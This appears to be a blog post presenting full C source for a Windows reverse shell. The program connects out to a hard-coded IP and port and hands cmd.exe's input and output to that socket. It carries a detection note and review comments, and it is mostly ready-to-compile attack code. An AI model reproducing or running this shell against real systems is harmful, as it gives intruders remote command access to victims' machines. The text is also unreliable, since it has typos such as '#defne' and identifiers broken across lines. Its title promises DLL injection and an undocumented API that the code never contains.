
Monday, October 31, 2011

Reverse shell through DLL Injection using undocumented API function

AJVrs.c
Reverse shell in win32
(c) by Andreas Venieris (aka thiseas) 2010
Compile with VS 2008 from command line with cl:
C:> cl AJVrs.c
******************************************************
*********/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib") // Inform the
linker that
// the Ws2_32.lib
file is needed.
#defne DEFAULT_PORT 1234
#defne DEFAULT_IP "192.168.1.70"
WSADATA wsaData;                        // filled in by WSAStartup() in main; its result is never checked
SOCKET Winsocket;                       // the outbound TCP socket; later cast to HANDLE and given to cmd.exe as all three std handles
STARTUPINFO theProcess;                 // CreateProcess startup info; carries the STARTF_USESTDHANDLES redirection
PROCESS_INFORMATION info_proc;          // handles/ids of the spawned cmd.exe; main neither waits on nor closes them
struct sockaddr_in Winsocket_Structure; // peer address: DEFAULT_IP/DEFAULT_PORT unless overridden via argv
/*
 * Entry point: connects a TCP socket to IP:port and spawns cmd.exe with its
 * standard handles redirected onto that socket.
 *
 * argv[1] = peer IP (dotted quad), argv[2] = peer port; both are read only
 * when exactly two arguments are given, otherwise DEFAULT_IP/DEFAULT_PORT.
 * Returns 1 if the socket or the process cannot be created, else 0.
 *
 * Defender's note: the observable pattern is a process that opens an outbound
 * TCP connection and then calls CreateProcess("cmd.exe") with
 * bInheritHandles=TRUE and STARTF_USESTDHANDLES pointing hStdInput,
 * hStdOutput and hStdError all at a socket handle rather than a console or
 * pipe. Telemetry that records the parent's network connection together with
 * the child's inherited std-handle types catches this regardless of the peer
 * or port used.
 */
int main(int argc, char *argv[])
{
char *IP = DEFAULT_IP;      // points at the string literal DEFAULT_IP, not at a writable buffer
short port = DEFAULT_PORT;  // atoi() result is narrowed to short; htons() below takes it as u_short
if (argc == 3){
// NOTE(review): this writes through IP into the string literal it points at
// (read-only on modern toolchains), and strncpy does not guarantee NUL
// termination when argv[1] is 16 or more characters.
strncpy(IP,argv[1],16);
port = atoi(argv[2]);       // no range/format validation of argv[2]
}

WSAStartup(MAKEWORD(2,2), &wsaData);    // return value ignored
// Both trailing (unsigned int)NULL casts are just 0: no group, no flags
// (presumably chosen so the socket is non-overlapped and usable as a std
// handle - confirm against WSASocket documentation).
Winsocket=WSASocket(AF_INET, SOCK_STREAM,
IPPROTO_TCP,NULL, (unsigned int)
NULL, (unsigned int) NULL);
Winsocket_Structure.sin_port=htons(port);
Winsocket_Structure.sin_family=AF_INET;
// inet_addr() returns INADDR_NONE for a malformed string; not checked here
Winsocket_Structure.sin_addr.s_addr=inet_
addr(IP);
if(Winsocket==INVALID_SOCKET)
{
WSACleanup();
return 1;
}
// On connect failure WSACleanup() runs but there is no return: execution
// falls through and CreateProcess below is still attempted with the
// unconnected socket as the child's std handles.
if(WSAConnect(Winsocket,(SOCKADDR*)&Winsocket_Str
ucture,sizeof(Winsocket_Structure),NULL,NULL,NULL,NULL) == SOCKET_ERROR)
{
WSACleanup();
}
  // Starting shell by creating a new process with
i/o redirection.
memset(&theProcess,0,sizeof(theProcess));
theProcess.cb=sizeof(theProcess);
theProcess.dwFlags=STARTF_USESTDHANDLES;    // tells CreateProcess to honour the hStd* fields below

  // here we make the redirection
// The socket handle is cast to HANDLE and used for stdin, stdout and stderr
// of the child; this is the line that makes the spawned shell bidirectional
// over the network connection.
theProcess.hStdInput = theProcess.hStdOutput
= theProcess.hStdError =
(HANDLE)Winsocket;

// fork the new process.
// lpApplicationName is NULL, so "cmd.exe" is resolved via the search path;
// bInheritHandles=TRUE is required for the socket handle to be valid in the
// child. Returns 0 on failure.
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,
0,NULL,NULL,&theProcess,&info_
proc)==0)
{
WSACleanup();
return 1;
}
// The parent exits immediately: no WaitForSingleObject on the child and the
// handles in info_proc are never closed. The child keeps the inherited socket.
return 0;
}
